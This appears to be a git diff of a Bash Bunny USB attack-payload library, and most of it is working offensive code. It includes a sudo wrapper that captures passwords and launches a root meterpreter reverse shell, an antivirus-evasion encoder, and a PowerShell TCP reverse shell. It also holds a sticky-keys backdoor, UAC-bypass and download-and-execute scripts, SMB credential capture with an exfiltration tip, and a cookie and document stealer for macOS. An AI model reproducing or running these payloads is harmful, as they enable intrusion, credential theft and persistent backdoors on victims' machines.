Current dev status: I have tested this on a linux box and been able to pwn it repeatedly. Everytime getting a root reverse shell.
|
||||
|
||||
## Description
|
||||
|
||||
Injector: Creates a folder called ~/.config/sudo where it puts a python wrapper for sudo and a meterpreter payload. Next, it copies over the python sudo wrapper and meterpreter payload. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for sudo and the path for python. The initialization function also initializes a file for saving sudo creds and slightly alters the meterpreter payload so it will fail silently if there is a bad network connection or other exception. Finally, it will set a new value in the user's PATH so that they will be running this wrapper instead of actually doing sudo. The main abnormality a user should see is a slight delay in being asked to enter their password. After this wrapper runs the desired sudo command, it will use the captured password (although probably not absolutely necessary at this stage) to have sudo run the meterpreter payload. That should open up a meterpreter session on the listening computer with root on the target. True pwnage. Every time they sudo something.
|
||||
Cleaner: I will probably make a cleaner for this thing eventually for completeness sake... but really, why make a cleaner when this thing should give you multiple remote root shells?
|
||||
|
||||
## Configuration
|
||||
|
||||
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode. This payload has been tested on mac and linux. Works on both mac and linux. Mac was running sophos antivirus during the test and it blocked download of the reverse tcp shell. This can be fixed with the use of my shell smuggler (see below for details).
|
||||
|
||||
##Crafting a meterpreter shell payload
|
||||
|
||||
Payloads should be crafted in msfvenom. The meterpreter shell will be the python reverse https meterpreter payload. The payload should be stored in the folder with the rest of the files for this bash bunny payload in a file called shell.py (stored on the target system as .sudo in the directory we created). The command for generating an appropriate meterpreter shell payload is below:
|
||||
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw > payload.py```
|
||||
|
||||
Note that *antivirus appears to pick up this reverse tcp payload* really well. Annoying. shellSmuggler.py to the rescue! The best way to run this is to cd into the bashbunny itself and then into the payloads switch folder you are running from and run the following command (plugging in your IP address and port):
|
||||
```msfvenom -p python/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=<PORT> -f raw | python ShellSmuggler.py > shell.py```
|
||||
|
||||
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
|
||||
Injector
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Amber blinking | Waiting for server |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
|
||||
Cleaner (when it is made)
|
||||
|
||||
| LED | Status |
|
||||
| ---------------- | -------------------- |
|
||||
| White | Ready |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
1
payloads/library/credentials/bushingsBlueTurtle/shell.py
Normal file
1
payloads/library/credentials/bushingsBlueTurtle/shell.py
Normal file
@@ -0,0 +1 @@
|
||||
YOUR MSFVENOM REVERSE PYTHON SHELL HERE (check out the readme.md file for more instructions)
|
||||
@@ -0,0 +1,55 @@
|
||||
#!/usr/bin/env python3
|
||||
|
||||
def grabEncoded(payload):
|
||||
import re
|
||||
regex = re.compile("sys\.version_info\[0\]\]\((\'.+\')\)")
|
||||
finder = re.search(regex, payload)
|
||||
encodedAttack = finder.group(1)
|
||||
payload = payload.replace(encodedAttack, "encodedAttack")
|
||||
return (encodedAttack, payload)
|
||||
|
||||
def getPayloadFromSTDIN():
|
||||
import sys
|
||||
payload = sys.stdin.read()
|
||||
return payload
|
||||
|
||||
def getPayloadFromFile(fileName):
|
||||
file = open(fileName, 'r')
|
||||
payload = file.read()
|
||||
file.close()
|
||||
return payload
|
||||
|
||||
def breakEncoded(encodedAttack):
|
||||
encoded1 = encodedAttack[::2]
|
||||
encoded2 = encodedAttack[1::2]
|
||||
return (encoded1, encoded2)
|
||||
|
||||
def makePrepend(encoded1, encoded2):
|
||||
rejoiner = "encodedAttack=''.join([''.join(item) for item in zip('%s','%s')]);" %(encoded1, encoded2)
|
||||
return rejoiner
|
||||
|
||||
def checkForInputFile():
|
||||
import sys
|
||||
args = sys.argv
|
||||
if len(args) > 2:
|
||||
raise RuntimeError("Only valid argument is a filename")
|
||||
if len(args) == 2:
|
||||
return args[1]
|
||||
else:
|
||||
return False
|
||||
|
||||
fileName = checkForInputFile()
|
||||
if fileName:
|
||||
payload = getPayloadFromFile(fileName)
|
||||
else:
|
||||
payload = getPayloadFromSTDIN()
|
||||
if not payload:
|
||||
raise RuntimeError("No payload was given")
|
||||
encodedAttack, payload = grabEncoded(payload)
|
||||
encodedAttack = encodedAttack.strip("'")
|
||||
encoded1, encoded2 = breakEncoded(encodedAttack)
|
||||
prepend = makePrepend(encoded1, encoded2)
|
||||
hiddenShell = prepend + payload
|
||||
|
||||
import sys
|
||||
sys.stdout.write(hiddenShell)
|
||||
@@ -3,14 +3,15 @@
|
||||
# Title: Mac Info Grabber
|
||||
# Author: kmakblob
|
||||
# Version: 1.2
|
||||
# Target: macOS
|
||||
# Description: Steaks cookies from chrome and documents from the documents folder (spreadsheets)
|
||||
# then stashes them in /root/udisk/loot/MacLoot
|
||||
#
|
||||
# Steaks cookies from chrome and documents from the documents folder (spreadsheets)
|
||||
# then stashes them in /root/udisk/loot/MacLoot
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Red................Failed to get spreadsheets
|
||||
# Purple.............Got some spreadsheets
|
||||
# Green..............Finished
|
||||
# LEDS:
|
||||
# Amber: Executing payload
|
||||
# Red: Failed to get spreadsheets
|
||||
# Purple: Got some spreadsheets
|
||||
# Green: Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
|
||||
@@ -3,7 +3,7 @@ Option Explicit
|
||||
'==============================================================================
|
||||
' Title: a.vbs
|
||||
' Author: RalphyZ
|
||||
' Version: 1.1
|
||||
' Version: 1.1a
|
||||
' Target: Windows 7+
|
||||
'
|
||||
' Description:
|
||||
|
||||
@@ -2,19 +2,17 @@
|
||||
#
|
||||
# Title: RAZ_VBScript
|
||||
# Author: RalphyZ
|
||||
# Version: 1.1
|
||||
# Version: 1.1a
|
||||
# Target: Windows 7+
|
||||
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
||||
# Dependencies: Included a.vbs script
|
||||
#
|
||||
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
||||
#
|
||||
# Colors:
|
||||
# | Status | Color | Description |
|
||||
# | ---------- | ------------------------------| ------------------------------------------------ |
|
||||
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
|
||||
# | FAIL | Red slow blink | Could not find the a.vbs script |
|
||||
# | ATTACK | Yellow single blink | Running the VBScript |
|
||||
# | FINISH | Green blink followed by SOLID | Script is finished |
|
||||
# LEDS:
|
||||
# Magenta: Setting attack mode, getting the switch position
|
||||
# Red Blink: Could not find the a.vbs script
|
||||
# Yellow Single Blink: Running the VBScript
|
||||
# Green Blink to Solid: Script is finished
|
||||
|
||||
# Magenta solid
|
||||
LED SETUP
|
||||
@@ -25,8 +23,8 @@ ATTACKMODE HID STORAGE
|
||||
# Get the switch position
|
||||
GET SWITCH_POSITION
|
||||
|
||||
Check if a.vbs is present
|
||||
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
||||
# Check if a.vbs is present
|
||||
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
@@ -43,4 +41,4 @@ QUACK ENTER
|
||||
|
||||
# Green 1000ms VERYFAST blink followed by SOLID
|
||||
LED FINISH
|
||||
exit 0
|
||||
exit 0
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
# RAZ_VBScript
|
||||
* Author: RalphyZ
|
||||
* Version: 1.1
|
||||
* Version: 1.1a
|
||||
* Target: Windows 7+
|
||||
* Category: Execution
|
||||
* Attackmode: HID, STORAGE
|
||||
@@ -8,6 +8,7 @@
|
||||
## Change Log
|
||||
| Version | Changes |
|
||||
| ------- | ------------------------------|
|
||||
| 1.1a | Fixed an error with a comment |
|
||||
| 1.1 | Updated for firmware 1.1 |
|
||||
| 1.0 | Initial release |
|
||||
|
||||
|
||||
32
payloads/library/execution/RevShellBack/README.md
Normal file
32
payloads/library/execution/RevShellBack/README.md
Normal file
@@ -0,0 +1,32 @@
|
||||
# RevShellBack
|
||||
|
||||
- Author: NodePoint
|
||||
- Version: 0.1.3
|
||||
- Target: Windows
|
||||
- Category: Execution
|
||||
|
||||
## Description
|
||||
|
||||
Set up a reverse shell and execute PowerShell/generic commands in the background from the Bash Bunny via USB ethernet.
|
||||
|
||||
## Configuration
|
||||
|
||||
Place powershell and/or generic commands between lines 53 and 58 (within the EOF).
|
||||
<br>
|
||||
Need to run as admin? Set the variable ADMIN to true.
|
||||
<br>
|
||||
Having issues obtaining a connection with the listener? Alter the time before connection attempt in NCDELAY.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| -------- | ----------------------------------------- |
|
||||
| SETUP | Setup (attackmode, variables, networking) |
|
||||
| STAGE1 | Open CMD (bypass UAC if ADMIN is true) |
|
||||
| STAGE2 | Initiate reverse shell |
|
||||
| SPECIAL1 | Set up listener and send out commands |
|
||||
| FINISH | Finished |
|
||||
|
||||
## Discussion
|
||||
|
||||
https://forums.hak5.org/topic/41955-payload-revshellback/
|
||||
69
payloads/library/execution/RevShellBack/payload.txt
Normal file
69
payloads/library/execution/RevShellBack/payload.txt
Normal file
@@ -0,0 +1,69 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: RevShellBack
|
||||
# Author: NodePoint
|
||||
# Version: 0.1.3
|
||||
# Category: Execution
|
||||
# Target: Windows
|
||||
# Attack Modes: RNDIS_ETHERNET, HID
|
||||
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Single Blink: Open CMD
|
||||
# Yellow Double Blink: Start Reverse Shell
|
||||
# Cyan Blink: Attack
|
||||
# Green: Finished
|
||||
|
||||
# Set attack mode
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
# Set variables
|
||||
GET HOST_IP
|
||||
GET TARGET_HOSTNAME
|
||||
# Netcat port number
|
||||
NCPORT=4444
|
||||
# Delay before attempting to connect to the netcat listener (ms)
|
||||
NCDELAY=200
|
||||
ADMIN=false
|
||||
|
||||
# Setup networking
|
||||
echo 1 > /proc/sys/net/ipv4/ip_forward
|
||||
iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
|
||||
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT
|
||||
|
||||
# Open CMD
|
||||
LED STAGE1
|
||||
if [ "$ADMIN" = true ] ; then
|
||||
# Bypass UAC
|
||||
RUN WIN powershell -c "Start-Process cmd -verb runas"
|
||||
Q DELAY 1500
|
||||
Q ALT Y
|
||||
Q DELAY 300
|
||||
# Hide CMD
|
||||
Q STRING "mode 18,1 & color FE & cd C:\ & title "
|
||||
Q ENTER
|
||||
else
|
||||
# Run as normal user
|
||||
RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
|
||||
Q DELAY 150
|
||||
fi
|
||||
|
||||
# Initiate reverse shell
|
||||
LED STAGE2
|
||||
Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
|
||||
Q ENTER
|
||||
|
||||
# Attack -- commands go within EOF
|
||||
LED SPECIAL1
|
||||
nc -q 0 -l -p $NCPORT <<EOF
|
||||
echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
|
||||
\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
|
||||
calc;
|
||||
Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
|
||||
EOF
|
||||
|
||||
# Done
|
||||
ATTACKMODE OFF
|
||||
LED FINISH
|
||||
@@ -2,17 +2,17 @@
|
||||
|
||||
# Title: ShellExec
|
||||
# Author: audibleblink
|
||||
# Target: Mac/Linux
|
||||
# Target: Mac, Linux
|
||||
# Version: 1.1
|
||||
# Attack Modes: ECM_ETHERNET, HID
|
||||
# Description: Create a web server on the BashBunny and force the victim to download and execute a script.
|
||||
# Perfect for when mass storage isn't an option.
|
||||
#
|
||||
# Create a web server on the BashBunny and force
|
||||
# the victim to download and execute a script.
|
||||
# Perfect for when mass storage isn't an option.
|
||||
#
|
||||
# White | Ready
|
||||
# Ammber blinking | Waiting for server
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
# LEDS:
|
||||
# White: Ready
|
||||
# Amber Blink: Waiting for server
|
||||
# Blue Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
|
||||
66
payloads/library/execution/StickyBunny/payload.txt
Normal file
66
payloads/library/execution/StickyBunny/payload.txt
Normal file
@@ -0,0 +1,66 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: StickyBunny
|
||||
# Author: Squibs
|
||||
# Version: 0.3
|
||||
# Attack Modes: HID
|
||||
# Target: Windows
|
||||
# Runtime: 18s
|
||||
# Description: Creates the sticky keys back door on a windows machine
|
||||
#
|
||||
# LEDS:
|
||||
# Blue: Preparing Attack
|
||||
# Yellow: Attacking
|
||||
# Green: Finished
|
||||
|
||||
#Open Admin Powershell
|
||||
ATTACKMODE HID
|
||||
LED B 200
|
||||
Q GUI
|
||||
Q DELAY 500
|
||||
Q STRING POWERSHELL
|
||||
Q DELAY 1000
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 2000
|
||||
Q LEFTARROW
|
||||
Q DELAY 100
|
||||
Q ENTER
|
||||
Q DELAY 1200
|
||||
|
||||
#Give Permissions for sethc.exe to current user
|
||||
LED Y 500
|
||||
Q STRING "\$Acl = Get-Acl sethc.exe"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING "\$Ar = New-Object system.security.accesscontrol.filesystemaccessrule(\$env:UserName,\"FullControl\",\"Allow\")"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING "\$Acl.SetAccessRule(\$Ar)"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING "Set-Acl sethc.exe \$Acl"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Copy over CMD to SETHC.EXE (Save sethc.exe as sethc.exe.bak if you want to be nice)
|
||||
Q STRING "xcopy sethc.exe sethc.exe.bak"
|
||||
Q ENTER
|
||||
Q DELAY 1200
|
||||
Q STRING "F"
|
||||
Q DELAY 100
|
||||
Q STRING "xcopy cmd.exe sethc.exe"
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING "Y"
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
|
||||
#Sync Drive
|
||||
sync
|
||||
|
||||
#Trap is clean!
|
||||
LED G
|
||||
21
payloads/library/execution/StickyBunny/readme.md
Normal file
21
payloads/library/execution/StickyBunny/readme.md
Normal file
@@ -0,0 +1,21 @@
|
||||
# StickyBunny
|
||||
* Author: Squibs
|
||||
* Version: 0.1
|
||||
* Target: Windows
|
||||
* Time: 19s
|
||||
|
||||
## Description
|
||||
|
||||
Changes the sticky keys executeable to a CMD executatble allowing CMD to be opened at login page.
|
||||
|
||||
## Configuration
|
||||
|
||||
None.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Blue (blinking) | Setting up |
|
||||
| Purple (blinking) | Running Attack |
|
||||
| Green (solid) | Complete |
|
||||
@@ -1,27 +1,32 @@
|
||||
# Title: UACBypass
|
||||
# Author: Skiddie
|
||||
# Version: 1.1
|
||||
# Target: Windows
|
||||
#
|
||||
# Download and executes any binary executable with administrator privileges WITHOUT
|
||||
# prompting the user for administrator rights (aka UAC bypass/exploit)
|
||||
# Please define URL and SAVEFILENAME in the a.vbs script
|
||||
# Target does need internet connection
|
||||
# Works on Windows 7 - Windows 10
|
||||
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
|
||||
# However from what i am aware version 7,8 and 8.1 are still effected
|
||||
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
|
||||
# Title: UACBypass
|
||||
# Author: Skiddie
|
||||
# Version: 1.1
|
||||
# Target: Windows
|
||||
# Attack Modes: HID, STORAGE
|
||||
#
|
||||
# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting
|
||||
# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
|
||||
# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
|
||||
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
|
||||
# However from what I am aware version 7,8 and 8.1 are still effected.
|
||||
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Starting
|
||||
# Green: Finished
|
||||
|
||||
#Define your bunny storage stick name
|
||||
DRIVER_LABEL='BashBunny'
|
||||
|
||||
#RED means starting
|
||||
LED R
|
||||
#Magenta means starting
|
||||
LED SETUP
|
||||
|
||||
#Gets File locations
|
||||
GET SWITCH_POSITION
|
||||
|
||||
#We are a keyboard
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
|
||||
QUACK DELAY 500
|
||||
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
|
||||
QUACK DELAY 1000
|
||||
@@ -32,4 +37,3 @@ LED G
|
||||
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
|
||||
#QUACK DELAY 4500
|
||||
#shutdown 0
|
||||
|
||||
|
||||
@@ -4,55 +4,52 @@
|
||||
# Author: LowValueTarget
|
||||
# Version: 1.2
|
||||
# Category: Powershell
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Target: Windows XP SP3+
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
# Firmware: >= 1.2
|
||||
#
|
||||
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
|
||||
#
|
||||
# | Attack Stage | Description |
|
||||
# | ------------------- | ---------------------------------------- |
|
||||
# | Stage 1 | Running Initial Powershell Commands |
|
||||
# | Stage 3 | Delivering powershell payload |
|
||||
# Firmware: >= 1.3
|
||||
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server.
|
||||
# Ensure p.txt (your powershell payload) exists in payload directory
|
||||
#
|
||||
# LEDS:
|
||||
# Yellow Single Blink: Running Initial Powershell Commands
|
||||
# Yellow Double Blink: Delivering powershell payload
|
||||
# Green: Finished
|
||||
# Red Blink: Failure
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
LED SETUP
|
||||
REQUIRETOOL gohttp
|
||||
|
||||
GET HOST_IP
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Set working dir
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
SERVER_LOG=$PAYLOAD_DIR/server.log
|
||||
# DEFINE DIRECTORIES
|
||||
PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
|
||||
SERVER_LOG=/tmp/server.log
|
||||
|
||||
# Fresh Server Log
|
||||
rm -f $SERVER_LOG
|
||||
# SERVER LOG
|
||||
rm -f ${SERVER_LOG}
|
||||
|
||||
# Check for gohttp
|
||||
REQUIRETOOL gohttp
|
||||
|
||||
# Start web server
|
||||
# START HTTP SERVER
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
|
||||
/tools/gohttp/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 &
|
||||
/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &
|
||||
|
||||
# Check for psh.txt
|
||||
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
|
||||
# CHECK FOR POWERSHELL
|
||||
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
|
||||
|
||||
# Attack HID
|
||||
# STAGE 1 - POWERSHELL
|
||||
LED STAGE1
|
||||
|
||||
# Attack (abbreviations to allow run execution)
|
||||
RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
|
||||
RUN WIN "powershell -WindowStyle Hidden \"\$web = New-Object Net.WebClient;While (\$true) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');exit}}\""
|
||||
# Remove tracks in the psh payload if you wish
|
||||
|
||||
# Attack Ethernet
|
||||
# STAGE 2 - WAIT
|
||||
LED STAGE2
|
||||
|
||||
while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
|
||||
while ! grep -Fq "GET \"/p.txt\"" ${SERVER_LOG}; do
|
||||
sleep .5
|
||||
done
|
||||
|
||||
|
||||
@@ -2,11 +2,11 @@
|
||||
## Powershell Download and Execute
|
||||
|
||||
* Author: LowValueTarget
|
||||
* Version: Version 1.2
|
||||
* Version: Version 1.3
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Powershell
|
||||
* Attackmodes: HID, RNDIS_Ethernet
|
||||
* Firmware: >= 1.2
|
||||
* Firmware: >= 1.3
|
||||
|
||||
## Description
|
||||
|
||||
@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve
|
||||
|
||||
## Configuration
|
||||
|
||||
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||
Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||
|
||||
## Requirements
|
||||
|
||||
@@ -24,22 +24,12 @@ gohttp is a standalone simple webserver that is quicker and more stable than pyt
|
||||
|
||||
__Installation__
|
||||
|
||||
Assuming you have Golang Installed (https://golang.org/dl/)
|
||||
|
||||
```
|
||||
go get -u github.com/itang/gohttp
|
||||
cd $GOPATH/src/github.com/itang/gohttp
|
||||
GOOS=linux GOARCH=arm go build
|
||||
mkdir $HOME/gohttp
|
||||
mv gohttp $HOME/gohttp/
|
||||
```
|
||||
|
||||
Then copy the gohttp folder in your home directory to the BashBunny /tools/ folder.
|
||||
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
|
||||
|
||||
## STATUS
|
||||
```
|
||||
| Attack Stage | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Stage 1 | Running Initial Powershell Commands |
|
||||
| Stage 3 | Delivering powershell payload |
|
||||
```
|
||||
| Stage 2 | Delivering powershell payload |
|
||||
```
|
||||
|
||||
@@ -2,21 +2,22 @@
|
||||
#
|
||||
# Title: Powershell Download and Execute SMB
|
||||
# Author: LowValueTarget
|
||||
# Version: 1.2
|
||||
# Version: 2.0
|
||||
# Category: Powershell
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
# Target: Windows XP SP3+
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Firmware: >= 1.2
|
||||
# Required Tools: impacket
|
||||
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer.
|
||||
# Possibilities are limitless! Credentials captured by are stored as loot.
|
||||
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
|
||||
#
|
||||
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
||||
# Ensure psh.txt exists in payload directory
|
||||
#
|
||||
# Requires Impacket is installed (python ./impacket/setup.py install)
|
||||
#
|
||||
# | Attack Stage | Description |
|
||||
# | ------------------- | ------------------------------|
|
||||
# | Stage 1 | Powershell |
|
||||
# | Stage 2 | Delivering powershell payload |
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Single Blink: Powershell
|
||||
# Yellow Double Blink: Delivering powershell payload
|
||||
# White: Clean up
|
||||
# Green: Finished
|
||||
#
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
@@ -29,48 +30,48 @@ GET SWITCH_POSITION
|
||||
GET TARGET_HOSTNAME
|
||||
GET HOST_IP
|
||||
|
||||
# DEFINE DIRECTORIES
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
# Check for psh.txt
|
||||
if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
|
||||
LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
|
||||
|
||||
mkdir -p /tmp/{l,p}
|
||||
|
||||
# CHECK FOR POWERSHELL
|
||||
if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
cp -R ${PAYLOAD_DIR}/* /tmp/
|
||||
cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
|
||||
|
||||
LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p ${LOOTDIR}
|
||||
# GET HOSTNAME
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
# If hostname is blank set it to "noname"
|
||||
[[ -z "$HOST" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
|
||||
[[ -z "${HOST}" ]] && HOST="noname"
|
||||
COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p ${LOOTDIR}/${HOST}-$COUNT
|
||||
mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||
LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
|
||||
|
||||
# Log file
|
||||
LOGFILE=psh_smb.log
|
||||
# START SMB SERVER
|
||||
LOGFILE=/tmp/l/psh_downloadsmb.log
|
||||
touch ${LOGFILE}
|
||||
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
|
||||
|
||||
# Start SMB Server
|
||||
mkdir -p /loot
|
||||
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
|
||||
|
||||
# STAGE 1 - Powershell
|
||||
# STAGE 1 - POWERSHELL
|
||||
LED STAGE1
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
|
||||
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
|
||||
# TIP: Remove tracks in the psh payload if you wish
|
||||
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
|
||||
# Remove tracks in the psh payload if you wish
|
||||
|
||||
# STAGE 2 - Wait until payload retrieved
|
||||
# Wait until payload is retrieved
|
||||
# STAGE 2 - HURRY UP AND WAIT
|
||||
LED STAGE2
|
||||
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
||||
|
||||
# CLEANUP
|
||||
LED CLEANUP
|
||||
|
||||
# Move loot to mass storage
|
||||
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
|
||||
rm /loot/${LOGFILE}
|
||||
# STASH THE LOOT
|
||||
mv /tmp/l/* ${LOOTDIR_BB}/
|
||||
rm -rf /tmp/{l,p}
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
|
||||
@@ -10,16 +10,20 @@
|
||||
|
||||
## Description
|
||||
|
||||
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
||||
Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.
|
||||
|
||||
## Configuration
|
||||
|
||||
* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||
* Requires Impacket is installed (python ./impacket/setup.py install)
|
||||
* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
|
||||
* Requires Impacket
|
||||
|
